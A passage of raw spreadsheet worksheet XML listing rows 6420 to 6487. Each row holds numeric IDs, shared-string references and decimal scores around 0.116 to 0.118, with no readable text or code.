      </c>
      <c r="E6420" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6420" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="6421" ht="15.75" customHeight="1">
      <c r="A6421" s="1">
        <v>28142.0</v>
      </c>
      <c r="B6421" s="2">
        <v>2.480131E7</v>
      </c>
      <c r="C6421" s="2" t="s">
        <v>6025</v>
      </c>
      <c r="D6421" s="2">
        <v>1.0</v>
      </c>
      <c r="E6421" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6421" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="6422" ht="15.75" customHeight="1">
      <c r="A6422" s="1">
        <v>31475.0</v>
      </c>
      <c r="B6422" s="2">
        <v>5.0486608E7</v>
      </c>
      <c r="C6422" s="2" t="s">
        <v>6115</v>
      </c>
      <c r="D6422" s="2">
        <v>1.0</v>
      </c>
      <c r="E6422" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6422" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="6423" ht="15.75" customHeight="1">
      <c r="A6423" s="1">
        <v>3704.0</v>
      </c>
      <c r="B6423" s="2">
        <v>3.958042E7</v>
      </c>
      <c r="C6423" s="2" t="s">
        <v>6116</v>
      </c>
      <c r="D6423" s="2">
        <v>1.0</v>
      </c>
      <c r="E6423" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6423" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="6424" ht="15.75" customHeight="1">
      <c r="A6424" s="1">
        <v>19356.0</v>
      </c>
      <c r="B6424" s="2">
        <v>5.5419609E7</v>
      </c>
      <c r="C6424" s="2" t="s">
        <v>6117</v>
      </c>
      <c r="D6424" s="2">
        <v>1.0</v>
      </c>
      <c r="E6424" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6424" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="6425" ht="15.75" customHeight="1">
      <c r="A6425" s="1">
        <v>20249.0</v>
      </c>
      <c r="B6425" s="2">
        <v>1.0949518E7</v>
      </c>
      <c r="C6425" s="2" t="s">
        <v>6118</v>
      </c>
      <c r="D6425" s="2">
        <v>1.0</v>
      </c>
      <c r="E6425" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6425" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="6426" ht="15.75" customHeight="1">
      <c r="A6426" s="1">
        <v>24150.0</v>
      </c>
      <c r="B6426" s="2">
        <v>1.0079165E7</v>
      </c>
      <c r="C6426" s="2" t="s">
        <v>6119</v>
      </c>
      <c r="D6426" s="2">
        <v>1.0</v>
      </c>
      <c r="E6426" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6426" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="6427" ht="15.75" customHeight="1">
      <c r="A6427" s="1">
        <v>24461.0</v>
      </c>
      <c r="B6427" s="2">
        <v>1.0949517E7</v>
      </c>
      <c r="C6427" s="2" t="s">
        <v>6118</v>
      </c>
      <c r="D6427" s="2">
        <v>1.0</v>
      </c>
      <c r="E6427" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6427" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="6428" ht="15.75" customHeight="1">
      <c r="A6428" s="1">
        <v>28253.0</v>
      </c>
      <c r="B6428" s="2">
        <v>2.533397E7</v>
      </c>
      <c r="C6428" s="2" t="s">
        <v>6120</v>
      </c>
      <c r="D6428" s="2">
        <v>1.0</v>
      </c>
      <c r="E6428" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6428" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="6429" ht="15.75" customHeight="1">
      <c r="A6429" s="1">
        <v>7832.0</v>
      </c>
      <c r="B6429" s="2">
        <v>5.2322113E7</v>
      </c>
      <c r="C6429" s="2" t="s">
        <v>6121</v>
      </c>
      <c r="D6429" s="2">
        <v>1.0</v>
      </c>
      <c r="E6429" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6429" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="6430" ht="15.75" customHeight="1">
      <c r="A6430" s="1">
        <v>20671.0</v>
      </c>
      <c r="B6430" s="2">
        <v>1.439329E7</v>
      </c>
      <c r="C6430" s="2" t="s">
        <v>6122</v>
      </c>
      <c r="D6430" s="2">
        <v>1.0</v>
      </c>
      <c r="E6430" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6430" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="6431" ht="15.75" customHeight="1">
      <c r="A6431" s="1">
        <v>24531.0</v>
      </c>
      <c r="B6431" s="2">
        <v>1.1198794E7</v>
      </c>
      <c r="C6431" s="2" t="s">
        <v>5986</v>
      </c>
      <c r="D6431" s="2">
        <v>1.0</v>
      </c>
      <c r="E6431" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6431" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="6432" ht="15.75" customHeight="1">
      <c r="A6432" s="1">
        <v>26213.0</v>
      </c>
      <c r="B6432" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C6432" s="2" t="s">
        <v>6123</v>
      </c>
      <c r="D6432" s="2">
        <v>1.0</v>
      </c>
      <c r="E6432" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6432" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="6433" ht="15.75" customHeight="1">
      <c r="A6433" s="1">
        <v>27639.0</v>
      </c>
      <c r="B6433" s="2">
        <v>2.2751783E7</v>
      </c>
      <c r="C6433" s="2" t="s">
        <v>6124</v>
      </c>
      <c r="D6433" s="2">
        <v>1.0</v>
      </c>
      <c r="E6433" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6433" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="6434" ht="15.75" customHeight="1">
      <c r="A6434" s="1">
        <v>3909.0</v>
      </c>
      <c r="B6434" s="2">
        <v>4.0496815E7</v>
      </c>
      <c r="C6434" s="2" t="s">
        <v>6125</v>
      </c>
      <c r="D6434" s="2">
        <v>1.0</v>
      </c>
      <c r="E6434" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6434" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="6435" ht="15.75" customHeight="1">
      <c r="A6435" s="1">
        <v>20262.0</v>
      </c>
      <c r="B6435" s="2">
        <v>1.1052061E7</v>
      </c>
      <c r="C6435" s="2" t="s">
        <v>6126</v>
      </c>
      <c r="D6435" s="2">
        <v>1.0</v>
      </c>
      <c r="E6435" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6435" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="6436" ht="15.75" customHeight="1">
      <c r="A6436" s="1">
        <v>21570.0</v>
      </c>
      <c r="B6436" s="2">
        <v>2.3782243E7</v>
      </c>
      <c r="C6436" s="2" t="s">
        <v>6051</v>
      </c>
      <c r="D6436" s="2">
        <v>1.0</v>
      </c>
      <c r="E6436" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6436" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="6437" ht="15.75" customHeight="1">
      <c r="A6437" s="1">
        <v>23765.0</v>
      </c>
      <c r="B6437" s="2">
        <v>7531719.0</v>
      </c>
      <c r="C6437" s="2" t="s">
        <v>6127</v>
      </c>
      <c r="D6437" s="2">
        <v>1.0</v>
      </c>
      <c r="E6437" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6437" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="6438" ht="15.75" customHeight="1">
      <c r="A6438" s="1">
        <v>28932.0</v>
      </c>
      <c r="B6438" s="2">
        <v>2.9589674E7</v>
      </c>
      <c r="C6438" s="2" t="s">
        <v>6128</v>
      </c>
      <c r="D6438" s="2">
        <v>1.0</v>
      </c>
      <c r="E6438" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6438" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="6439" ht="15.75" customHeight="1">
      <c r="A6439" s="1">
        <v>29782.0</v>
      </c>
      <c r="B6439" s="2">
        <v>3.5019921E7</v>
      </c>
      <c r="C6439" s="2" t="s">
        <v>6129</v>
      </c>
      <c r="D6439" s="2">
        <v>1.0</v>
      </c>
      <c r="E6439" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6439" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="6440" ht="15.75" customHeight="1">
      <c r="A6440" s="1">
        <v>31209.0</v>
      </c>
      <c r="B6440" s="2">
        <v>4924055.0</v>
      </c>
      <c r="C6440" s="2" t="s">
        <v>6130</v>
      </c>
      <c r="D6440" s="2">
        <v>1.0</v>
      </c>
      <c r="E6440" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6440" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="6441" ht="15.75" customHeight="1">
      <c r="A6441" s="1">
        <v>31309.0</v>
      </c>
      <c r="B6441" s="2">
        <v>4969625.0</v>
      </c>
      <c r="C6441" s="2" t="s">
        <v>6131</v>
      </c>
      <c r="D6441" s="2">
        <v>1.0</v>
      </c>
      <c r="E6441" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6441" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="6442" ht="15.75" customHeight="1">
      <c r="A6442" s="1">
        <v>32420.0</v>
      </c>
      <c r="B6442" s="2">
        <v>5.6425744E7</v>
      </c>
      <c r="C6442" s="2" t="s">
        <v>6132</v>
      </c>
      <c r="D6442" s="2">
        <v>1.0</v>
      </c>
      <c r="E6442" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6442" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="6443" ht="15.75" customHeight="1">
      <c r="A6443" s="1">
        <v>13807.0</v>
      </c>
      <c r="B6443" s="2">
        <v>3.6660419E7</v>
      </c>
      <c r="C6443" s="2" t="s">
        <v>6133</v>
      </c>
      <c r="D6443" s="2">
        <v>1.0</v>
      </c>
      <c r="E6443" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6443" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6444" ht="15.75" customHeight="1">
      <c r="A6444" s="1">
        <v>22566.0</v>
      </c>
      <c r="B6444" s="2">
        <v>3.8487295E7</v>
      </c>
      <c r="C6444" s="2" t="s">
        <v>6134</v>
      </c>
      <c r="D6444" s="2">
        <v>1.0</v>
      </c>
      <c r="E6444" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6444" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6445" ht="15.75" customHeight="1">
      <c r="A6445" s="1">
        <v>23254.0</v>
      </c>
      <c r="B6445" s="2">
        <v>5310915.0</v>
      </c>
      <c r="C6445" s="2" t="s">
        <v>6135</v>
      </c>
      <c r="D6445" s="2">
        <v>1.0</v>
      </c>
      <c r="E6445" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6445" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6446" ht="15.75" customHeight="1">
      <c r="A6446" s="1">
        <v>23712.0</v>
      </c>
      <c r="B6446" s="2">
        <v>7182866.0</v>
      </c>
      <c r="C6446" s="2" t="s">
        <v>6136</v>
      </c>
      <c r="D6446" s="2">
        <v>1.0</v>
      </c>
      <c r="E6446" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6446" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6447" ht="15.75" customHeight="1">
      <c r="A6447" s="1">
        <v>24827.0</v>
      </c>
      <c r="B6447" s="2">
        <v>1.2123574E7</v>
      </c>
      <c r="C6447" s="2" t="s">
        <v>6137</v>
      </c>
      <c r="D6447" s="2">
        <v>1.0</v>
      </c>
      <c r="E6447" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6447" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6448" ht="15.75" customHeight="1">
      <c r="A6448" s="1">
        <v>25227.0</v>
      </c>
      <c r="B6448" s="2">
        <v>1.3333238E7</v>
      </c>
      <c r="C6448" s="2" t="s">
        <v>6138</v>
      </c>
      <c r="D6448" s="2">
        <v>1.0</v>
      </c>
      <c r="E6448" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6448" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6449" ht="15.75" customHeight="1">
      <c r="A6449" s="1">
        <v>25531.0</v>
      </c>
      <c r="B6449" s="2">
        <v>1.4222297E7</v>
      </c>
      <c r="C6449" s="2" t="s">
        <v>6139</v>
      </c>
      <c r="D6449" s="2">
        <v>1.0</v>
      </c>
      <c r="E6449" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6449" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6450" ht="15.75" customHeight="1">
      <c r="A6450" s="1">
        <v>25664.0</v>
      </c>
      <c r="B6450" s="2">
        <v>1.4523398E7</v>
      </c>
      <c r="C6450" s="2" t="s">
        <v>6140</v>
      </c>
      <c r="D6450" s="2">
        <v>1.0</v>
      </c>
      <c r="E6450" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6450" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6451" ht="15.75" customHeight="1">
      <c r="A6451" s="1">
        <v>25875.0</v>
      </c>
      <c r="B6451" s="2">
        <v>1.4935796E7</v>
      </c>
      <c r="C6451" s="2" t="s">
        <v>6141</v>
      </c>
      <c r="D6451" s="2">
        <v>1.0</v>
      </c>
      <c r="E6451" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6451" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6452" ht="15.75" customHeight="1">
      <c r="A6452" s="1">
        <v>27590.0</v>
      </c>
      <c r="B6452" s="2">
        <v>2.25603E7</v>
      </c>
      <c r="C6452" s="2" t="s">
        <v>6142</v>
      </c>
      <c r="D6452" s="2">
        <v>1.0</v>
      </c>
      <c r="E6452" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6452" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6453" ht="15.75" customHeight="1">
      <c r="A6453" s="1">
        <v>30377.0</v>
      </c>
      <c r="B6453" s="2">
        <v>3.8487294E7</v>
      </c>
      <c r="C6453" s="2" t="s">
        <v>6134</v>
      </c>
      <c r="D6453" s="2">
        <v>1.0</v>
      </c>
      <c r="E6453" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6453" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6454" ht="15.75" customHeight="1">
      <c r="A6454" s="1">
        <v>30808.0</v>
      </c>
      <c r="B6454" s="2">
        <v>4.5288882E7</v>
      </c>
      <c r="C6454" s="2" t="s">
        <v>6143</v>
      </c>
      <c r="D6454" s="2">
        <v>1.0</v>
      </c>
      <c r="E6454" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6454" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6455" ht="15.75" customHeight="1">
      <c r="A6455" s="1">
        <v>33718.0</v>
      </c>
      <c r="B6455" s="2">
        <v>8512122.0</v>
      </c>
      <c r="C6455" s="2" t="s">
        <v>6144</v>
      </c>
      <c r="D6455" s="2">
        <v>1.0</v>
      </c>
      <c r="E6455" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6455" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6456" ht="15.75" customHeight="1">
      <c r="A6456" s="1">
        <v>34119.0</v>
      </c>
      <c r="B6456" s="2">
        <v>9768682.0</v>
      </c>
      <c r="C6456" s="2" t="s">
        <v>6145</v>
      </c>
      <c r="D6456" s="2">
        <v>1.0</v>
      </c>
      <c r="E6456" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6456" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="6457" ht="15.75" customHeight="1">
      <c r="A6457" s="1">
        <v>22633.0</v>
      </c>
      <c r="B6457" s="2">
        <v>4.0604319E7</v>
      </c>
      <c r="C6457" s="2" t="s">
        <v>6146</v>
      </c>
      <c r="D6457" s="2">
        <v>1.0</v>
      </c>
      <c r="E6457" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6457" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="6458" ht="15.75" customHeight="1">
      <c r="A6458" s="1">
        <v>20883.0</v>
      </c>
      <c r="B6458" s="2">
        <v>1.6083481E7</v>
      </c>
      <c r="C6458" s="2" t="s">
        <v>6147</v>
      </c>
      <c r="D6458" s="2">
        <v>1.0</v>
      </c>
      <c r="E6458" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6458" s="2">
        <v>0.117283950617284</v>
      </c>
    </row>
    <row r="6459" ht="15.75" customHeight="1">
      <c r="A6459" s="1">
        <v>26157.0</v>
      </c>
      <c r="B6459" s="2">
        <v>1.608348E7</v>
      </c>
      <c r="C6459" s="2" t="s">
        <v>6147</v>
      </c>
      <c r="D6459" s="2">
        <v>1.0</v>
      </c>
      <c r="E6459" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6459" s="2">
        <v>0.117283950617284</v>
      </c>
    </row>
    <row r="6460" ht="15.75" customHeight="1">
      <c r="A6460" s="1">
        <v>22193.0</v>
      </c>
      <c r="B6460" s="2">
        <v>3.1819659E7</v>
      </c>
      <c r="C6460" s="2" t="s">
        <v>6148</v>
      </c>
      <c r="D6460" s="2">
        <v>1.0</v>
      </c>
      <c r="E6460" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6460" s="2">
        <v>0.1171875</v>
      </c>
    </row>
    <row r="6461" ht="15.75" customHeight="1">
      <c r="A6461" s="1">
        <v>28048.0</v>
      </c>
      <c r="B6461" s="2">
        <v>2.4544786E7</v>
      </c>
      <c r="C6461" s="2" t="s">
        <v>6149</v>
      </c>
      <c r="D6461" s="2">
        <v>1.0</v>
      </c>
      <c r="E6461" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6461" s="2">
        <v>0.1168300653594771</v>
      </c>
    </row>
    <row r="6462" ht="15.75" customHeight="1">
      <c r="A6462" s="1">
        <v>21566.0</v>
      </c>
      <c r="B6462" s="2">
        <v>2.3731787E7</v>
      </c>
      <c r="C6462" s="2" t="s">
        <v>6150</v>
      </c>
      <c r="D6462" s="2">
        <v>1.0</v>
      </c>
      <c r="E6462" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6462" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="6463" ht="15.75" customHeight="1">
      <c r="A6463" s="1">
        <v>21876.0</v>
      </c>
      <c r="B6463" s="2">
        <v>2.7638091E7</v>
      </c>
      <c r="C6463" s="2" t="s">
        <v>6151</v>
      </c>
      <c r="D6463" s="2">
        <v>1.0</v>
      </c>
      <c r="E6463" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6463" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="6464" ht="15.75" customHeight="1">
      <c r="A6464" s="1">
        <v>31202.0</v>
      </c>
      <c r="B6464" s="2">
        <v>4922266.0</v>
      </c>
      <c r="C6464" s="2" t="s">
        <v>6152</v>
      </c>
      <c r="D6464" s="2">
        <v>1.0</v>
      </c>
      <c r="E6464" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6464" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="6465" ht="15.75" customHeight="1">
      <c r="A6465" s="1">
        <v>1259.0</v>
      </c>
      <c r="B6465" s="2">
        <v>2.5207648E7</v>
      </c>
      <c r="C6465" s="2" t="s">
        <v>6153</v>
      </c>
      <c r="D6465" s="2">
        <v>1.0</v>
      </c>
      <c r="E6465" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6465" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6466" ht="15.75" customHeight="1">
      <c r="A6466" s="1">
        <v>4954.0</v>
      </c>
      <c r="B6466" s="2">
        <v>4.4053344E7</v>
      </c>
      <c r="C6466" s="2" t="s">
        <v>6154</v>
      </c>
      <c r="D6466" s="2">
        <v>1.0</v>
      </c>
      <c r="E6466" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6466" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6467" ht="15.75" customHeight="1">
      <c r="A6467" s="1">
        <v>7313.0</v>
      </c>
      <c r="B6467" s="2">
        <v>5.0865984E7</v>
      </c>
      <c r="C6467" s="2" t="s">
        <v>6155</v>
      </c>
      <c r="D6467" s="2">
        <v>1.0</v>
      </c>
      <c r="E6467" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6467" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6468" ht="15.75" customHeight="1">
      <c r="A6468" s="1">
        <v>13773.0</v>
      </c>
      <c r="B6468" s="2">
        <v>3.6528626E7</v>
      </c>
      <c r="C6468" s="2" t="s">
        <v>6156</v>
      </c>
      <c r="D6468" s="2">
        <v>1.0</v>
      </c>
      <c r="E6468" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6468" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6469" ht="15.75" customHeight="1">
      <c r="A6469" s="1">
        <v>15163.0</v>
      </c>
      <c r="B6469" s="2">
        <v>4.1999996E7</v>
      </c>
      <c r="C6469" s="2" t="s">
        <v>6157</v>
      </c>
      <c r="D6469" s="2">
        <v>1.0</v>
      </c>
      <c r="E6469" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6469" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6470" ht="15.75" customHeight="1">
      <c r="A6470" s="1">
        <v>15986.0</v>
      </c>
      <c r="B6470" s="2">
        <v>4.4917895E7</v>
      </c>
      <c r="C6470" s="2" t="s">
        <v>6158</v>
      </c>
      <c r="D6470" s="2">
        <v>1.0</v>
      </c>
      <c r="E6470" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6470" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6471" ht="15.75" customHeight="1">
      <c r="A6471" s="1">
        <v>16182.0</v>
      </c>
      <c r="B6471" s="2">
        <v>4.5653148E7</v>
      </c>
      <c r="C6471" s="2" t="s">
        <v>6159</v>
      </c>
      <c r="D6471" s="2">
        <v>1.0</v>
      </c>
      <c r="E6471" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6471" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6472" ht="15.75" customHeight="1">
      <c r="A6472" s="1">
        <v>16949.0</v>
      </c>
      <c r="B6472" s="2">
        <v>4.8234752E7</v>
      </c>
      <c r="C6472" s="2" t="s">
        <v>6160</v>
      </c>
      <c r="D6472" s="2">
        <v>1.0</v>
      </c>
      <c r="E6472" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6472" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6473" ht="15.75" customHeight="1">
      <c r="A6473" s="1">
        <v>18727.0</v>
      </c>
      <c r="B6473" s="2">
        <v>5.3695342E7</v>
      </c>
      <c r="C6473" s="2" t="s">
        <v>6161</v>
      </c>
      <c r="D6473" s="2">
        <v>1.0</v>
      </c>
      <c r="E6473" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6473" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6474" ht="15.75" customHeight="1">
      <c r="A6474" s="1">
        <v>19121.0</v>
      </c>
      <c r="B6474" s="2">
        <v>5.4757932E7</v>
      </c>
      <c r="C6474" s="2" t="s">
        <v>6162</v>
      </c>
      <c r="D6474" s="2">
        <v>1.0</v>
      </c>
      <c r="E6474" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6474" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6475" ht="15.75" customHeight="1">
      <c r="A6475" s="1">
        <v>19634.0</v>
      </c>
      <c r="B6475" s="2">
        <v>5.6278179E7</v>
      </c>
      <c r="C6475" s="2" t="s">
        <v>6163</v>
      </c>
      <c r="D6475" s="2">
        <v>1.0</v>
      </c>
      <c r="E6475" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6475" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6476" ht="15.75" customHeight="1">
      <c r="A6476" s="1">
        <v>19881.0</v>
      </c>
      <c r="B6476" s="2">
        <v>5.7256677E7</v>
      </c>
      <c r="C6476" s="2" t="s">
        <v>6164</v>
      </c>
      <c r="D6476" s="2">
        <v>1.0</v>
      </c>
      <c r="E6476" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6476" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6477" ht="15.75" customHeight="1">
      <c r="A6477" s="1">
        <v>20290.0</v>
      </c>
      <c r="B6477" s="2">
        <v>1.1210911E7</v>
      </c>
      <c r="C6477" s="2" t="s">
        <v>6165</v>
      </c>
      <c r="D6477" s="2">
        <v>1.0</v>
      </c>
      <c r="E6477" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6477" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6478" ht="15.75" customHeight="1">
      <c r="A6478" s="1">
        <v>20642.0</v>
      </c>
      <c r="B6478" s="2">
        <v>1.4220312E7</v>
      </c>
      <c r="C6478" s="2" t="s">
        <v>6166</v>
      </c>
      <c r="D6478" s="2">
        <v>1.0</v>
      </c>
      <c r="E6478" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6478" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6479" ht="15.75" customHeight="1">
      <c r="A6479" s="1">
        <v>21098.0</v>
      </c>
      <c r="B6479" s="2">
        <v>1.8076643E7</v>
      </c>
      <c r="C6479" s="2" t="s">
        <v>6167</v>
      </c>
      <c r="D6479" s="2">
        <v>1.0</v>
      </c>
      <c r="E6479" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6479" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6480" ht="15.75" customHeight="1">
      <c r="A6480" s="1">
        <v>21122.0</v>
      </c>
      <c r="B6480" s="2">
        <v>1.8344222E7</v>
      </c>
      <c r="C6480" s="2" t="s">
        <v>6168</v>
      </c>
      <c r="D6480" s="2">
        <v>1.0</v>
      </c>
      <c r="E6480" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6480" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6481" ht="15.75" customHeight="1">
      <c r="A6481" s="1">
        <v>21779.0</v>
      </c>
      <c r="B6481" s="2">
        <v>2.6453731E7</v>
      </c>
      <c r="C6481" s="2" t="s">
        <v>6169</v>
      </c>
      <c r="D6481" s="2">
        <v>1.0</v>
      </c>
      <c r="E6481" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6481" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6482" ht="15.75" customHeight="1">
      <c r="A6482" s="1">
        <v>21836.0</v>
      </c>
      <c r="B6482" s="2">
        <v>2.7084369E7</v>
      </c>
      <c r="C6482" s="2" t="s">
        <v>6170</v>
      </c>
      <c r="D6482" s="2">
        <v>1.0</v>
      </c>
      <c r="E6482" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6482" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6483" ht="15.75" customHeight="1">
      <c r="A6483" s="1">
        <v>22037.0</v>
      </c>
      <c r="B6483" s="2">
        <v>3.0205156E7</v>
      </c>
      <c r="C6483" s="2" t="s">
        <v>6171</v>
      </c>
      <c r="D6483" s="2">
        <v>1.0</v>
      </c>
      <c r="E6483" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6483" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6484" ht="15.75" customHeight="1">
      <c r="A6484" s="1">
        <v>22149.0</v>
      </c>
      <c r="B6484" s="2">
        <v>3.1272333E7</v>
      </c>
      <c r="C6484" s="2" t="s">
        <v>6172</v>
      </c>
      <c r="D6484" s="2">
        <v>1.0</v>
      </c>
      <c r="E6484" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6484" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6485" ht="15.75" customHeight="1">
      <c r="A6485" s="1">
        <v>22863.0</v>
      </c>
      <c r="B6485" s="2">
        <v>4.7252712E7</v>
      </c>
      <c r="C6485" s="2" t="s">
        <v>6173</v>
      </c>
      <c r="D6485" s="2">
        <v>1.0</v>
      </c>
      <c r="E6485" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6485" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6486" ht="15.75" customHeight="1">
      <c r="A6486" s="1">
        <v>22979.0</v>
      </c>
      <c r="B6486" s="2">
        <v>4.9289771E7</v>
      </c>
      <c r="C6486" s="2" t="s">
        <v>6174</v>
      </c>
      <c r="D6486" s="2">
        <v>1.0</v>
      </c>
      <c r="E6486" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6486" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="6487" ht="15.75" customHeight="1">
      <c r="A6487" s="1">
        <v>22994.0</v>
      </c>
      <c r="B6487" s="2">
        <v>4.9502762E7</v>
      </c>
      <c r="C6487" s="2" t="s">
        <v>6175</v>
      </c>
      <c r="D6487" s="2">
        <v>1.0</v>
      </c>
      <c r="E6487" s="3" t="s">
